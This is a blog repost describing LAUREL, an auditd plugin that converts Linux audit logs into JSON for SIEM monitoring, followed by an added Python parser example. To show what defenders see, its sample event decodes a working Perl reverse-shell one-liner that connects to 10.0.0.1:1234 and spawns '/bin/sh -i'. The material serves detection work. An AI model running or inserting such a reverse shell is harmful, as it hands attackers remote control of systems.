Laurel - Transform Linux Audit Logs For SIEM Usage
July 26, 2022, 12:30 p.m. | noreply@blogger.com (Unknown)
KitPloit - PenTest Tools! www.kitploit.com
LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.
Why?
TLDR: Instead of audit events that look like this…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…turn them into JSON logs where the mess your pen testers/red teamers/attackers are trying to make becomes apparent at first glance. The a2 value above is opaque only because auditd hex-encodes any string field that contains a space, a quote or a non-printable byte; decoded, it is the payload:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
This happens at the source. The generated event even contains useful information about the …
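What the post-processing step amounts to, as an added Python example (not LAUREL's own code, which is written in Rust): parse the `type=… msg=audit(ID): key=value…` records auditd writes, hex-decode the string fields auditd encoded, fold `a0..aN` into an ordered `ARGV` list, and coalesce all records that share one event ID into a single JSON object keyed by record type. The sample log, the field names treated as strings, and the `ID`/`SYSCALL`/`PROCTITLE` keys in the output are this example's own constructions, loosely modelled on the JSON shown above.

```python
import json
import re

# Constructed sample: the records auditd emits for one execve() of
# `perl -e 'print "hello world"'`, all sharing event ID 1626611363.720:348501.
# a2= and proctitle= are hex-encoded because they contain spaces, quotes or NULs.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1626611363.720:348501): arch=c000003e syscall=59 success=yes exit=0 ppid=1337 pid=1338 auid=1000 uid=1000 comm="perl" exe="/usr/bin/perl" key="exec"
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=7072696E74202268656C6C6F20776F726C6422
type=PROCTITLE msg=audit(1626611363.720:348501): proctitle=7065726C002D65007072696E74202268656C6C6F20776F726C6422
type=EOE msg=audit(1626611363.720:348501):
"""

_HEADER_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+:\d+)\):\s*(.*)$")
_FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S*)')
_HEX_RE = re.compile(r"^(?:[0-9A-F]{2})+$")
_ARGV_RE = re.compile(r"^a(\d+)$")
# Fields auditd may hex-encode (example's own list). Only these and a0..aN are
# hex-decoded: a purely numeric field such as pid=1338 would otherwise pass as hex.
_STRING_FIELDS = {"comm", "exe", "cwd", "key", "proctitle", "name"}


def decode_value(key, raw):
    """Turn one raw auditd field value into a Python value."""
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]                      # "safe" string, printed quoted
    if (key in _STRING_FIELDS or _ARGV_RE.match(key)) and _HEX_RE.match(raw):
        text = bytes.fromhex(raw).decode("utf-8", errors="replace")
        # proctitle separates argv entries with NUL bytes; show a command line
        return text.replace("\0", " ") if key == "proctitle" else text
    if raw.isdigit():
        return int(raw)                       # pid=, uid=, argc=, exit=, ...
    return raw                                # arch=c000003e, success=yes, ...


def parse_record(line):
    """Split one audit line into (record type, event ID, decoded fields)."""
    m = _HEADER_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an audit record: {line!r}")
    rtype, event_id, body = m.groups()
    fields = {k: decode_value(k, v) for k, v in _FIELD_RE.findall(body)}
    if rtype == "EXECVE":
        # Collapse a0..aN into an ordered list, as in the ARGV shown above.
        argv = {}
        for k in list(fields):
            am = _ARGV_RE.match(k)
            if am:
                argv[int(am.group(1))] = fields.pop(k)
        fields["ARGV"] = [argv[i] for i in sorted(argv)]
    return rtype, event_id, fields


def coalesce(log_text):
    """Group records by event ID into one dict per event, keyed by record type."""
    events = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rtype, event_id, fields = parse_record(line)
        if rtype == "EOE":                    # end-of-event marker, carries no data
            continue
        events.setdefault(event_id, {"ID": event_id})[rtype] = fields
    return list(events.values())


if __name__ == "__main__":
    for event in coalesce(SAMPLE_LOG):
        print(json.dumps(event))
```

Caveat: real auditd output has more shapes than this handles, notably EXECVE arguments longer than the kernel's per-field limit, which arrive split as `aN_len=` plus `aN[0]=`, `aN[1]=`, … chunks that must be concatenated before decoding; a production parser (LAUREL included) also has to cope with records of one event arriving interleaved with those of another.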
audit auditd laurel linux logs plugin ruleset rust siem tracking